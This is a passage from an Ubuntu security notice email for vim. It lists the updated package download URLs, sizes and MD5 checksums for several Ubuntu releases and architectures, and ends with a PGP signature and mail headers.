    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   801926 4ba448ba11132ed8cf7a54fef482287f
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   796202 43edf711b07fa56643a5fb8eded714a6
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   760386 804ef83be2b6fe1a1205dc47dfb2688b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:    83338 c5aadd2ccb560b7b9a0af14a36a57463
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   751596 88933c97a543b045f5a2a989f9388fa5
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:    70042 a8d6b75acfbed2cf74ef004b0d92e366
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   385816 b39f990cfa7c107f00bee3963b89bb53
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   584808 d2fe4dd57e23835eb0083b9aaa3d0ee5
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   749082 bdfefe496675144e1d4e5de26efeff87
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   756456 9a43ff7be0d00dee2cefd09ed97a8485
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   749096 9aca70326bd2980bc3024581ea89dc7c
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   744754 b2f2b57fd4cc6f25f1dde87ecf09e320
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_sparc.deb
      Size/MD5:   708382 66fb791aae316f93f73280196da96709

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-056+2ubuntu2.1.diff.gz
      Size/MD5:   393692 1b3b5f04cd4a81d38ed0690b6b9d7743
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-056+2ubuntu2.1.dsc
      Size/MD5:     1610 c3ab1ce8845e412ffc2b44cc78637c0b
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.orig.tar.gz
      Size/MD5:  8773102 e916524e292fc482f43c8c2d30a30fa6

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_7.1-056+2ubuntu2.1_all.deb
      Size/MD5:  2130870 7ea95575b4acd8ee853a36ec453b48fb
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_7.1-056+2ubuntu2.1_all.deb
      Size/MD5:   150228 db6e3271ed87baea4c6083b8e1fc1876
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_7.1-056+2ubuntu2.1_all.deb
      Size/MD5:  5422078 f33d8d8c2e2669580872134440a1359b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:   186800 9ece94f30dbc2cb3f7832ebd894213c1
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:  1065528 ff141a43b5b1af110693ccfcb95046c0
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:   374196 34964c0414fba2796d8cfd4ac242ed7e
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:   854278 9eacc7e610cc130327f56f12fe4d79ff
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-full_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:  1094640 c07a85be1440a56630d3104de9d1c3d9
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:  1058146 7f80bd3a81e4d483668e044a3c1df6b1
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:  1061814 f1d25e364183d9a3639ff6a89379c92a
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:  1058170 90f07708118219a113ce1ed200a723bd
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:  1053596 cd8af8025c00d2875fc4114e8c32ad6e
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_7.1-056+2ubuntu2.1_amd64.deb
      Size/MD5:   994498 99b25af6fbf7ed37397343c9aedb118a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   186526 1c5b14a967c56f527abde15a6cc270f2
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   938974 625fc2a4f8a12e88ac252c451f3e6024
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   320798 c96cff6480b4489dbecdd1f39cf01ad2
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   746298 9251a78ad602636fd9699314ec77d666
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-full_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   966390 4eefee53ec26b0852b4c1a1976aeb71e
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   932676 226be7042400feaf9b62efa930286c14
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   938568 9d8d4f4e85d1be84cf24c1be21e955ca
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   932694 57864d7a940bede3c58d2e2dfcb35912
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   927378 dc14a22042c2b7530f9e1c18a50f53f5
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_7.1-056+2ubuntu2.1_i386.deb
      Size/MD5:   869332 11400fcc70fcc6dd84bed14379c70efc

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   186600 220221a93ba298595d0651e8976832d2
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   947352 740a1f4daf8a645b8e74e9180c5c5b67
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   324578 586e93debbb43b0ce0ed6a21eb72920d
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   754072 3f7c52e9ca8b845e64285e4fb51a85b6
    http://ports.ubuntu.com/pool/universe/v/vim/vim-full_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   974946 18c7df52886b595a94e97f1c2407888a
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   941128 88c01ab5f296975105a8faab719a3c15
    http://ports.ubuntu.com/pool/universe/v/vim/vim-perl_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   947516 d705d68732b735a043ec08b53533a58f
    http://ports.ubuntu.com/pool/universe/v/vim/vim-python_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   941142 4b45cd44c494f0f831ece3c22b971594
    http://ports.ubuntu.com/pool/universe/v/vim/vim-ruby_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   936940 637b9e9f371939b0c46bf6e4a9c0453f
    http://ports.ubuntu.com/pool/universe/v/vim/vim-tcl_7.1-056+2ubuntu2.1_lpia.deb
      Size/MD5:   878208 2e89f9f2a81b820de804396ff46d57f6

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:   187136 1131b7bbb93c812894fc3cc3f4f815a0
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:  1035838 51c45eefb668ae4afa1f363d9a0a5ccb
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:   358830 86e4c33cbf991ae34f1d4e8bc3059029
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:   825842 9506722a8f49dc4f30e47c6c3a2577ba
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-full_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:  1065266 5e1a252c5b864ec8a96b515d269c39c6
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:  1030034 177485eaf310d460b58874117416fb98
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:  1036130 2bdcae3b51d8922f1ec5b11ac65399ae
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:  1030058 e81a49b046a9707d4670bf1573d16554
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:  1024506 f49b7283b734fc51c4f9f2948cc90c7e
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_7.1-056+2ubuntu2.1_powerpc.deb
      Size/MD5:   965684 689fd854cdea0e3bf0c09247fa6c9984

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   186772 6b2986febbe1fc5e3e6cea7cc9c1d042
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   967554 6879daa23034ded4a78d134e2492b29f
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   330680 b7edd78593478bba9ae8884d1f3b2db1
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   765590 184029618474b7ebff72ed5eb41ace18
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-full_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   994152 c798eb18c3692edbd07017bc32c25627
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   960806 bb1b172f87715a0cd61aee3ff7c8cf47
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   967366 4a7f6b8872335c3c421c7057cfc7351a
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   960816 ed648eaf0545d24c5b6d009d7ecbf47d
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   956596 02184debe746effd8ae7528428652485
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_7.1-056+2ubuntu2.1_sparc.deb
      Size/MD5:   895664 997ef5a68f8f5b0720cc5c25c40e8a7f

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-138+1ubuntu3.1.diff.gz
      Size/MD5:   482742 54eb4229d5763120208d2d20ac809f44
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-138+1ubuntu3.1.dsc
      Size/MD5:     1509 5c4c3bba5ccc75298dd423f4b716c91f
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.orig.tar.gz
      Size/MD5:  8773102 e916524e292fc482f43c8c2d30a30fa6

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:  2132596 28304b786a3b70580db9e0bab2949552
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:   151400 1bd9f4fc6a3e51fe45cbcbd8416bd248
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:  5419710 3492313bbadd1ddbc65ae4b08ae66d05
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-full_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:    74274 3bc4d91c11f1bc969e78ac73487c51c3
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:    74248 89c8890423010c4a34382a64d0d62ad3
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:    74256 a5366868ac4c658d64ab9e9fc3cbbb9a
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:    74250 55a74caafbcf80c8a9ef714e6d422b7f
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_7.1-138+1ubuntu3.1_all.deb
      Size/MD5:    74248 56bc2e22a7d05b999a72958350b1902f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1-138+1ubuntu3.1_amd64.deb
      Size/MD5:   190268 dd94c487b0403b57ca0fb0001a7e723b
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1-138+1ubuntu3.1_amd64.deb
      Size/MD5:  1084070 aa9eb702fc2c39ef9b92301314e64536
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1-138+1ubuntu3.1_amd64.deb
      Size/MD5:   374196 ab44a42f4060b718ce8fc7c8cbbd43e8
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-138+1ubuntu3.1_amd64.deb
      Size/MD5:   918830 fd5621c6395501a2f662f008fdad5ca6
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1-138+1ubuntu3.1_amd64.deb
      Size/MD5:  1082024 a3bd8980e3fdc023a069a0a08051c4db
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-nox_7.1-138+1ubuntu3.1_amd64.deb
      Size/MD5:   937480 caf015d69dcb0a15b1d5ca3232592cba

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1-138+1ubuntu3.1_i386.deb
      Size/MD5:   190018 6fc29d7ee77a24113d8d5827639fa7f6
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1-138+1ubuntu3.1_i386.deb
      Size/MD5:   958664 0ceb5bbcc17fe99a7e7d7acd1f47709e
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1-138+1ubuntu3.1_i386.deb
      Size/MD5:   320494 543a7b4a0d0a464591f3b9824c5b9f97
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1-138+1ubuntu3.1_i386.deb
      Size/MD5:   809564 6c12ed10616a76a71cd7cba5ff0d706d
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1-138+1ubuntu3.1_i386.deb
      Size/MD5:   956016 cb03086864f236c27c325bf738447097
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-nox_7.1-138+1ubuntu3.1_i386.deb
      Size/MD5:   828428 7d080579043951e47115254ec5bc07ad

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1-138+1ubuntu3.1_lpia.deb
      Size/MD5:   190110 b98fda9bbfc55b72ed8519cf3c41cf6e
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1-138+1ubuntu3.1_lpia.deb
      Size/MD5:   966628 afaa5b401da251ffd52213652eabc7ed
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1-138+1ubuntu3.1_lpia.deb
      Size/MD5:   324812 d8b3a9f212990d18c01ffc8b74646e5d
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1-138+1ubuntu3.1_lpia.deb
      Size/MD5:   816836 45fb07768698cf1e7c56b59b2553949b
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1-138+1ubuntu3.1_lpia.deb
      Size/MD5:   964296 ea8310422488da931a80a2cc78fee31b
    http://ports.ubuntu.com/pool/universe/v/vim/vim-nox_7.1-138+1ubuntu3.1_lpia.deb
      Size/MD5:   836018 b44ae3764cbb051af9cfde49efc129b9

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1-138+1ubuntu3.1_powerpc.deb
      Size/MD5:   190664 c8fabe23845a2be35527a1cf0b7410b6
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1-138+1ubuntu3.1_powerpc.deb
      Size/MD5:  1058820 2b1e8327f081ab564e8e52110f1dfccf
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1-138+1ubuntu3.1_powerpc.deb
      Size/MD5:   359578 13a805fda9db9cb5d1e119074369a9b6
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1-138+1ubuntu3.1_powerpc.deb
      Size/MD5:   890486 ce4c2d195c093e9d30b0ff5dfb18739d
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1-138+1ubuntu3.1_powerpc.deb
      Size/MD5:  1056292 213988f1463b4bdbc08a5a86f6b2344d
    http://ports.ubuntu.com/pool/universe/v/vim/vim-nox_7.1-138+1ubuntu3.1_powerpc.deb
      Size/MD5:   913762 2f28cae371414308904467f5d44e79dc

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1-138+1ubuntu3.1_sparc.deb
      Size/MD5:   190158 0c6c24efd2fab3b4e276f2e3a2289860
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1-138+1ubuntu3.1_sparc.deb
      Size/MD5:   985654 3a0dd240e32dfc1c642ce51a741b0fa9
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1-138+1ubuntu3.1_sparc.deb
      Size/MD5:   330026 8d03c143ad76d77456e66ba681c539d9
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1-138+1ubuntu3.1_sparc.deb
      Size/MD5:   828736 a69be6d5a2b1cd10d57b5b01b808c2ac
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1-138+1ubuntu3.1_sparc.deb
      Size/MD5:   982666 490d12ba995b15e2909f50891395ac87
    http://ports.ubuntu.com/pool/universe/v/vim/vim-nox_7.1-138+1ubuntu3.1_sparc.deb
      Size/MD5:   848732 70a096cecb67556bd29dc93ba1ad4b96

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.314-3ubuntu3.1.diff.gz
      Size/MD5:   426252 17db7251b8ae83a1b3cfdada9629c7e2
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.314-3ubuntu3.1.dsc
      Size/MD5:     1815 4a9a9a4389c9a782918c156121af7289
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.314.orig.tar.gz
      Size/MD5: 10273809 90784dbb53ddb4d8bb6b5d5892746690

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:  2143942 fcaeeb43ec4383c003e241dc0c03e3c6
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:   157332 89665dd2ffe56175c27ebf5b273b33a8
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:  5416638 5bd7a798f4974b1a742e166f4a1948a8
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-full_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:    80484 f9f95788dc145a4a5adce70127e25fb7
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:    80460 1e538697b9acacf0562f5281c9972196
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:    80464 25404cc2da5db7fbfb2dc464f4ac5bcc
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:    80460 1490c97c35d08e5fdf8a6582f4593f3c
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_7.1.314-3ubuntu3.1_all.deb
      Size/MD5:    80458 d9c1af5990326706ac6c2e85d3914b2c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:   201452 41e47f5906491f4363cd2fc9292c4dd0
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-dbg_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:  7539466 e3843facd22bc5a2e1c06b5877260997
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:  1133170 db72063dfbc68422476bf981c10d5d18
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:   393742 963794c604bf32bdc2307658e5dc8de7
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:   958906 5c96db766b1b7bc858612f31e583441e
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:  1131118 7dfa2c23b77e805c56bb6dd211167ea5
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-nox_7.1.314-3ubuntu3.1_amd64.deb
      Size/MD5:   984434 16f435c32aaa406e0dcb957d93e75c5f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:   201076 a025e59fe74d25dbe45df8f40cb6c257
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-dbg_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:  6918862 0795f4cc1958fe9313a7e44206c313a1
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:  1001884 d43eaa31f3f3c866381fc5a5e4f4dee0
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:   337034 e7ebe3a74ed41afe68c7732247f15932
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:   845336 9e75ff117dce2a31ea81b737ca42c1a6
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:  1000194 06f79cb34f9823349db18f1de30a137a
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-nox_7.1.314-3ubuntu3.1_i386.deb
      Size/MD5:   869936 3996bfdeef67484a530e9c0a972a4b4b

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:   201064 81b05c562a88a311741c9f445b346cb6
    http://ports.ubuntu.com/pool/main/v/vim/vim-dbg_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:  7057912 32da5634da78296764a4eda78f283de7
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:  1002748 2b547a5b3da808f481fb1f9e1bc40f9a
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:   338056 e61b7aaa0371c20248119fea51d99e1c
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:   846448 cb613a4daa7a7bc45f313244c7953082
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:  1000440 28349733f5a54289d2f6e30028e3153b
    http://ports.ubuntu.com/pool/universe/v/vim/vim-nox_7.1.314-3ubuntu3.1_lpia.deb
      Size/MD5:   871132 315ddba20a3c20ca065b25abdb036f6e

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:   201568 58e6c305160bab301344618e3ab7d1ba
    http://ports.ubuntu.com/pool/main/v/vim/vim-dbg_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:  7315038 ace59d423fb0a1bee81f0181d3ad3d8a
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:  1091626 8f6488a48a78491169ecbb11e25b8593
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:   373910 3acd020fafd580e39cec25b9a1b3ae90
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:   921236 95eac3965aed8eaf4623de9717596d28
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:  1089970 13e8c07752dceff491c7c0e5c4a2cff9
    http://ports.ubuntu.com/pool/universe/v/vim/vim-nox_7.1.314-3ubuntu3.1_powerpc.deb
      Size/MD5:   948830 31053af16f48643bb7e7ebbef2d665ae

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/v/vim/vim-common_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:   201384 2e0b5c020c791383af5e6f6b100b3515
    http://ports.ubuntu.com/pool/main/v/vim/vim-dbg_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:  6488360 91ce6060a4e564a04df77272d0c49ead
    http://ports.ubuntu.com/pool/main/v/vim/vim-gnome_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:  1018922 ff5ac5548640101097090567aeb8629b
    http://ports.ubuntu.com/pool/main/v/vim/vim-tiny_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:   343254 315121752514c84f869c9749fe9ee7bb
    http://ports.ubuntu.com/pool/main/v/vim/vim_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:   856666 be7425321108fab242c081a04f0858ff
    http://ports.ubuntu.com/pool/universe/v/vim/vim-gtk_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:  1017684 b25e0111341e8838c3a98eb317f62c30
    http://ports.ubuntu.com/pool/universe/v/vim/vim-nox_7.1.314-3ubuntu3.1_sparc.deb
      Size/MD5:   882514 09f11d2b3e15319facb480831818c873



--=-9GE7RjQnL3MhNgSK5oSw
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkl/A6wACgkQLMAs/0C4zNriSQCgwwqzNUpYmxLnFglqFkn5VYxz
4VQAnRnYsnX92ohyyYkP05SdqGhLjAZf
=ZhH6
-----END PGP SIGNATURE-----

--=-9GE7RjQnL3MhNgSK5oSw--

From - Tue Jan 27 11:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d1a
